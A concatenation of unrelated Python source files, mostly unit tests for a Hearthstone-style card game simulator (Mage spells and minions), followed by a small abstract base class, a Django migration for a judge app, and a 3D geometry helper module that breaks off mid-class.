self.assertTrue(game.current_player.hero.frozen)
game.play_single_turn()
game.play_single_turn()
# The player should still be frozen from last turn, and so shouldn't have attacked
self.assertEqual(30, game.current_player.hero.health)
def test_IceLance(self):
game = generate_game_for(IceLance, OasisSnapjaw, CardTestingAgent, OneCardPlayingAgent)
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(26, game.other_player.hero.health)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].frozen)
self.assertEqual(7, game.other_player.minions[0].health)
def test_ManaWyrm(self):
deck1 = StackedDeck([ManaWyrm(), IceLance(), ManaWyrm(), IceLance(), IceLance(), IceLance()],
CHARACTER_CLASS.MAGE)
deck2 = StackedDeck([IronbeakOwl()], CHARACTER_CLASS.PALADIN)
game = Game([deck1, deck2], [CardTestingAgent(), OneCardPlayingAgent()])
game.pre_game()
game.current_player = 1
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual("Mana Wyrm", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[1].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual(5, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[1].calculate_max_health())
def test_MirrorImage(self):
game = generate_game_for(MirrorImage, StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(0, game.current_player.minions[0].calculate_attack())
self.assertEqual(2, game.current_player.minions[0].health)
self.assertTrue(game.current_player.minions[0].taunt)
self.assertEqual("Mirror Image", game.current_player.minions[0].card.name)
self.assertEqual(0, game.current_player.minions[0].card.mana)
self.assertEqual(0, game.current_player.minions[1].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].health)
self.assertTrue(game.current_player.minions[1].taunt)
self.assertEqual("Mirror Image", game.current_player.minions[1].card.name)
self.assertEqual(0, game.current_player.minions[1].card.mana)
def test_ArcaneExplosion(self):
game = generate_game_for(BloodfenRaptor, ArcaneExplosion, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.other_player.hero.health)
def test_Frostbolt(self):
game = generate_game_for(OasisSnapjaw, Frostbolt, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(27, game.other_player.hero.health)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(24, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertTrue(game.other_player.minions[0].frozen)
def test_SorcerersApprentice(self):
game = generate_game_for([SorcerersApprentice, ArcaneMissiles, SorcerersApprentice, Frostbolt, Frostbolt,
Frostbolt], StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(2, game.current_player.minions[0].health)
self.assertEqual("Sorcerer's Apprentice", game.current_player.minions[0].card.name)
# Arcane missiles should also have been played, since it is now free
self.assertEqual(27, game.other_player.hero.health)
# Make sure the other frostbolts have been properly reduced
self.assertEqual(1, game.current_player.hand[1].mana_cost())
self.assertEqual(1, game.current_player.hand[2].mana_cost())
game.play_single_turn()
game.play_single_turn()
# Both Sorcerer's Apprentices are killed by friendly Frostbolts.
self.assertEqual(0, len(game.current_player.minions))
# Make sure that the cards in hand are no longer reduced
self.assertEqual(2, game.current_player.hand[0].mana_cost())
def test_ArcaneIntellect(self):
game = generate_game_for(ArcaneIntellect, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.hand))
def test_FrostNova(self):
game = generate_game_for(FrostNova, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
for minion in game.other_player.minions:
self.assertTrue(minion.frozen)
self.assertFalse(game.other_player.hero.frozen)
def test_Counterspell(self):
game = generate_game_for(Counterspell, Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Counterspell", game.current_player.secrets[0].name)
game.play_single_turn()
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(27, game.other_player.hero.health)
# Ensure that secrets are being removed after being revealed
self.assertEqual(0, len(game.other_player.secrets))
def test_IceBarrier(self):
game = generate_game_for(IceBarrier, StonetuskBoar, CardTestingAgent, PredictableAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Ice Barrier", game.current_player.secrets[0].name)
game.play_single_turn()
# only one minion because PredictableAgent will shoot its own minions if there isn't anything else to shoot.
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, game.other_player.hero.armor)
# Attacked twice on the first turn, then fireballed before getting the armor up
self.assertEqual(27, game.other_player.hero.health)
# Make sure we can't have two identical secrets at the same time
random.seed(1857)
game = generate_game_for(IceBarrier, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual("Ice Barrier", game.other_player.secrets[0].name)
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Ice Barrier", game.current_player.secrets[0].name)
def test_IceBlock(self):
game = generate_game_for([IceBlock, Deathwing], Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(game.other_player.hero.health, 3)
self.assertEqual(1, len(game.other_player.secrets))
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, game.other_player.hero.health)
self.assertEqual(0, len(game.other_player.secrets))
game.play_single_turn()
game.play_single_turn()
self.assertTrue(game.game_ended)
def test_MirrorEntity(self):
game = generate_game_for([StonetuskBoar, MirrorEntity], IronfurGrizzly, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Mirror Entity", game.current_player.secrets[0].name)
game.play_single_turn()
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual("Ironfur Grizzly", game.other_player.minions[1].card.name)
self.assertEqual(game.other_player, game.other_player.minions[1].player)
self.assertEqual(1, game.other_player.minions[1].index)
def test_Spellbender(self):
game = generate_game_for([Spellbender, Wisp], Moonfire, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
# The moonfire should have been re-directed to the Spellbender, which should have taken one damage
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual(2, game.other_player.minions[1].health)
self.assertEqual(1, game.other_player.minions[1].calculate_attack())
self.assertEqual("Spellbender", game.other_player.minions[1].card.name)
# Now make sure it won't work when the hero is targeted
random.seed(1857)
game = generate_game_for(Spellbender, Moonfire, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(23, game.other_player.hero.health)
# Now make sure it doesn't activate when a non-targeted spell is used
random.seed(1857)
game = generate_game_for(Spellbender, ArcaneIntellect, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
# The arcane intellect should not have caused the Spellbender to activate
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
def test_SpellbenderFullBoard(self):
game = generate_game_for([Spellbender, Onyxia], Assassinate, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(17):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(7, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(6, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
def test_Spellbender_full_board_target_hero(self):
game = generate_game_for(BaneOfDoom, [Wisp, Wisp, Wisp, Wisp, Wisp, Wisp, Wisp, Spellbender],
OneCardPlayingAgent, CardTestingAgent)
for turn in range(10):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
game.other_player.agent.choose_target = lambda targets: game.players[1].hero
game.play_single_turn()
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.secrets))
def test_Spellbender_target_hero_and_attack(self):
game = generate_game_for([Spellbender, OasisSnapjaw], [LavaBurst, Wisp, Loatheb],
OneCardPlayingAgent, PlayAndAttackAgent)
for turn in range(5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(25, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(6, game.other_player.minions[0].health)
self.assertEqual(1, len(game.other_player.secrets))
def test_Vaporize(self):
game = generate_game_for(Vaporize, FaerieDragon, CardTestingAgent, MinionAttackingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(30, game.other_player.hero.health)
random.seed(1857)
game = generate_game_for(Vaporize, Swipe, CardTestingAgent, PredictableAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.secrets))
self.assertFalse(game.current_player.hero.dead)
def test_KirinTorMage(self):
game = generate_game_for([KirinTorMage, Vaporize, Spellbender], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Vaporize", game.current_player.secrets[0].name)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Kirin Tor Mage", game.current_player.minions[0].card.name)
self.assertEqual(3, game.current_player.hand[0].mana_cost())
self.assertEqual("Spellbender", game.current_player.hand[0].name)
random.seed(1857)
game = generate_game_for([KirinTorMage, Vaporize], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.secrets))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Kirin Tor Mage", game.current_player.minions[0].card.name)
self.assertEqual(3, game.current_player.hand[2].mana_cost())
self.assertEqual("Vaporize", game.current_player.hand[2].name)
def test_EtherealArcanist(self):
game = generate_game_for([Spellbender, EtherealArcanist], StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[0].calculate_attack())
self.assertEqual(5, game.current_player.minions[0].health)
self.assertEqual(5, game.current_player.minions[0].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, game.current_player.minions[0].calculate_attack())
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[0].calculate_max_health())
game.current_player.minions[0].silence()
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
# Test when the player has no secrets at all
random.seed(1857)
game = generate_game_for(EtherealArcanist, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
def test_ConeOfCold(self):
game = generate_game_for(ConeOfCold, [StonetuskBoar, BloodfenRaptor, BloodfenRaptor], CardTestingAgent,
OneCardPlayingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].frozen)
self.assertEqual(1, game.other_player.minions[0].health)
self.assertTrue(game.other_player.minions[1].frozen)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertFalse(game.other_player.minions[2].frozen)
self.assertEqual(1, game.other_player.minions[2].health)
self.assertEqual(30, game.other_player.hero.health)
# Now check to ensure that it will work when targeting the other end of the minion list
game.current_player.agent.choose_target = lambda targets: targets[len(targets) - 1]
game.play_single_turn()
game.play_single_turn()
# Neither of the minions which survive Cone of Cold will be frozen, since they weren't touched this round
self.assertEqual(2, len(game.other_player.minions))
self.assertFalse(game.other_player.minions[0].frozen)
self.assertFalse(game.other_player.minions[1].frozen)
def test_Fireball(self):
game = generate_game_for([Fireball, KoboldGeomancer], StonetuskBoar, EnemySpellTestingAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(24, game.other_player.hero.health)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(17, game.other_player.hero.health)
def test_Polymorph(self):
game = generate_game_for(MogushanWarden, Polymorph, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertTrue(game.current_player.minions[0].taunt)
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual("Mogu'shan Warden", game.current_player.minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertFalse(game.other_player.minions[0].taunt)
self.assertEqual(1, game.other_player.minions[0].calculate_attack())
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual("Sheep", game.other_player.minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.other_player.minions[0].card.minion_type)
def test_Blizzard(self):
game = generate_game_for(Blizzard, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[1].health)
self.assertFalse(game.current_player.minions[0].frozen)
self.assertFalse(game.current_player.minions[1].frozen)
game.play_single_turn()
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual(5, game.other_player.minions[0].health)
self.assertEqual(5, game.other_player.minions[1].health)
self.assertTrue(game.other_player.minions[0].frozen)
self.assertTrue(game.other_player.minions[1].frozen)
def test_Flamestrike(self):
game = generate_game_for(Flamestrike, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[1].health)
self.assertEqual(7, game.current_player.minions[2].health)
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(3, game.other_player.minions[1].health)
self.assertEqual(3, game.other_player.minions[2].health)
def test_Pyroblast(self):
game = generate_game_for(Pyroblast, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 18):
game.play_single_turn()
self.assertEqual(30, game.current_player.hero.health)
game.play_single_turn()
self.assertEqual(20, game.other_player.hero.health)
def test_ArchmageAntonidas(self):
game = generate_game_for([ArchmageAntonidas, Vaporize], StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Archmage Antonidas", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual("Fireball", game.current_player.hand[9].name)
def test_Duplicate(self):
game = generate_game_for([BloodfenRaptor, Duplicate], ShadowBolt, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(6, len(game.other_player.hand))
self.assertEqual("Bloodfen Raptor", game.other_player.hand[4].name)
self.assertEqual("Bloodfen Raptor", game.other_player.hand[5].name)
self.assertEqual(0, len(game.other_player.secrets))
def test_Duplicate_and_play_after(self):
game = generate_game_for([Wisp, Wisp, Wisp, Wisp, Wisp, Duplicate], LightningStorm,
CardTestingAgent, OneCardPlayingAgent)
for turn in range(5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.hand))
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(2, len(game.other_player.hand))
game.play_single_turn()
self.assertEqual(0, len(game.current_player.hand))
self.assertEqual(3, len(game.current_player.minions))
def test_Duplicate_MadScientist(self):
game = generate_game_for(Hellfire, [MadScientist, MagmaRager, Duplicate],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(0, len(game.current_player.secrets))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual("Magma Rager", game.other_player.hand[-1].name)
self.assertEqual("Magma Rager", game.other_player.hand[-2].name)
def test_Snowchugger(self):
game = generate_game_for(Snowchugger, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual("Snowchugger", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
# Always false after the end of a turn
self.assertTrue(game.other_player.hero.frozen)
# Now make sure that attacking the Snowchugger directly will freeze a character
random.seed(1857)
game = generate_game_for(Snowchugger, IronbarkProtector, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(2, game.other_player.minions[0].health)
# The player should be frozen because of weapon attack
self.assertEqual(29, game.current_player.hero.health)
self.assertTrue(game.current_player.hero.frozen)
game.play_single_turn()
game.play_single_turn()
# The player should still be frozen from last turn, and thus shouldn't have attacked
self.assertEqual(29, game.current_player.hero.health)
# If Snowchugger gets 0 attack, and is being attacked so will the minion NOT be frozen since no damage was dealt
game = generate_game_for(Snowchugger, StonetuskBoar, PredictableAgent, PredictableAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual("Snowchugger", game.players[1].minions[0].card.name)
# Cheat
game.players[1].minions[0].base_attack = 0
self.assertEqual(0, game.players[1].minions[0].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].health)
# Stonetusk should have attacked the Snowchugger, and will NOT be frozen since they didn't take damage
game.play_single_turn()
self.assertEqual(1, game.players[1].minions[0].health)
self.assertFalse(game.players[0].minions[0].frozen)
def test_GoblinBlastmage(self):
game = generate_game_for([GoblinBlastmage, ClockworkGnome, GoblinBlastmage], [Mechwarper, ClockworkGnome],
CardTestingAgent, CardTestingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(1, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[2].health)
self.assertEqual(1, game.current_player.minions[3].health)
self.assertEqual(3, game.current_player.minions[4].health)
self.assertEqual(1, game.current_player.minions[5].health)
self.assertEqual(3, game.current_player.minions[6].health)
# Blastmage should not go off, as there is no friendly mech down
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(3, game.other_player.minions[2].health)
self.assertEqual(1, game.other_player.minions[3].health)
self.assertEqual(3, game.other_player.minions[4].health)
self.assertEqual(1, game.other_player.minions[5].health)
self.assertEqual(3, game.other_player.minions[6].health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
# The Blastmage hits the warper at index 2 twice, and the two gnomes at indices 1 and 3.
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(5, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(1, game.other_player.minions[2].health)
self.assertEqual(3, game.other_player.minions[3].health)
self.assertEqual(3, game.other_player.minions[4].health)
self.assertEqual(30, game.other_player.hero.health)
def test_Flamecannon(self):
game = generate_game_for(Flamecannon, SenjinShieldmasta, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# Flamecannon hasn't been played since there hasn't been an enemy minion until now.
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(5, game.players[1].minions[0].health)
# Enemy minion exist, so Flamecannon will be played.
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
def test_WeeSpellstopper(self):
game = generate_game_for(WeeSpellstopper, ShadowBolt, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# First Spellstopper gets Bolted but lives with 1 hp
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
# Once there are 2 Spellstoppers, they are both spell immune
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
game.play_single_turn()
game.players[0].minions[0].die(None)
game.players[0].minions[1].die(None)
game.check_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
# Last Spellstopper is not immune and dies to Shadow Bolt
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
def test_WeeSpellstopperSilence(self):
game = generate_game_for(WeeSpellstopper, [Silence, ShadowBolt], OneCardPlayingAgent,
OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# First Spellstopper gets silenced
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].health)
# Once there are 2 Spellstoppers, but only the first receives the aura
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(5, game.players[0].minions[1].health)
def test_FlameLeviathan(self):
game = generate_game_for(Wisp, FlameLeviathan, CardTestingAgent, CardTestingAgent)
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(28, game.current_player.hero.health)
self.assertEqual(28, game.other_player.hero.health)
def test_EchoOfMedivh(self):
game = generate_game_for([NoviceEngineer, NoviceEngineer, GnomishInventor, GnomishInventor, EchoOfMedivh], Wisp,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
# Plays first 4 "draw" minions
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(4, len(game.players[0].minions))
game.play_single_turn()
# Plays Echo and overflows
self.assertEqual(10, len(game.players[0].hand))
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual("Novice Engineer", game.players[0].hand[8].name)
self.assertEqual("Novice Engineer", game.players[0].hand[9].name)
def test_UnstablePortal(self):
game = generate_game_for(UnstablePortal, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(3):
game.play_single_turn()
self.assertEqual(5, len(game.current_player.hand))
self.assertTrue(game.current_player.hand[-1].is_minion())
if game.current_player.hand[-1].mana >= 3:
# TODO This assertion may fail, if unstable portal summons a Giant. Don't know how to solve that issue
self.assertEqual(3, game.current_player.hand[-1].mana - game.current_player.hand[-1].mana_cost())
def test_DragonsBreath(self):
game = generate_game_for([Flamestrike, DragonsBreath], StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(13):
game.play_single_turn()
# The flamestrike kills 6 boars, so the Dragon's Breath is free
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(26, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
# The Flamestrike only kills one boar, so we can't afford the Dragon's breath
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(26, game.other_player.hero.health)
def test_Flamewaker(self):
game = generate_game_for([Flamewaker, CircleOfHealing], CircleOfHealing,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(28, game.players[1].hero.health)
|
from abc import ABC, abstractmethod
class StartableBase(ABC):
"""Abstract base class for Thread- and Process-like objects."""
__slots__ = ()
@abstractmethod
def start(self) -> None:
raise NotImplementedError
__all__ = ["StartableBase"]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-29 23:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('judge', '0007_auto_20160228_1453'),
]
operations = [
migrations.RemoveField(
model_name='problem',
name='judged_by',
),
migrations.AddField(
model_name='submission',
name='detail_message',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='submission',
name='status',
field=models.CharField(choices=[('SU', 'Submitting'), ('SE', 'Submission Error'), ('CO', 'Compiling'), ('CE', 'Compilation Error'), ('JU', 'Judging'), ('AC', 'Accepted'), ('PA', 'Partially Accepted'), ('TL', 'Time Limit Exceeded'), ('ML', 'Memory Limit Exceeded'), ('RE', 'Runtime Error')], default='SU', max_length=2),
),
]
|
"""3D geometric functions used by the visualizer."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union
import numpy as np
from ..label.typing import Box3D
def rotate_vector(
vector: np.ndarray,
rot_x: float = 0,
rot_y: float = 0,
rot_z: float = 0,
center: Union[np.ndarray, None] = None,
) -> np.ndarray:
"""Rotate a vector given axis-angles."""
if center is not None:
vector -= center
x0, y0, z0 = vector.tolist()
cos_ry, sin_ry = [np.cos(rot_y), np.sin(rot_y)]
x1, y1, z1 = [sin_ry * z0 + cos_ry * x0, y0, cos_ry * z0 - sin_ry * x0]
cos_rz, sin_rz = [np.cos(rot_z), np.sin(rot_z)]
x2, y2, z2 = [cos_rz * x1 - sin_rz * y1, sin_rz * x1 + cos_rz * y1, z1]
cos_rx, sin_rx = [np.cos(rot_x), np.sin(rot_x)]
x3, y3, z3 = [x2, cos_rx * y2 - sin_rx * z2, sin_rx * y2 + cos_rx * z2]
vector = np.array([x3, y3, z3])
if center is not None:
vector += center
return vector
def vector_3d_to_2d(
vector: np.ndarray, calibration: np.ndarray
) -> List[float]:
"""Project 3d vector to the 2d camera view."""
vec_3d = np.ones(3)
vec_3d[:3] = vector
vec_2d = np.dot(calibration, vec_3d)
# print(calibration, vec_3d, vec_2d)
return [vec_2d[0] / vec_2d[2], vec_2d[1] / vec_2d[2]]
def check_side_of_line(
point: np.ndarray, line: Tuple[np.ndarray, np.ndarray]
) -> int:
"""Chece which side does a point locate."""
p1, p2 = line
det = (point[0] - p1[0]) * (p2[1] - p1[1]) - (point[1] - p1[1]) * (
p2[0] - p1[0]
)
return int(np.sign(det))
def check_clockwise(points: List[np.ndarray]) -> int:
"""Check whether the 4 points in a clockwise order."""
p1, p2, p3, p4 = points
s1 = check_side_of_line(p3, (p1, p2))
s2 = check_side_of_line(p4, (p2, p3))
s3 = check_side_of_line(p1, (p3, p4))
s4 = check_side_of_line(p2, (p4, p1))
if s1 == s2 == s3 == s4:
return int(s1)
return 0
@dataclass
class Vertex:
"""Calss for 3D vertex."""
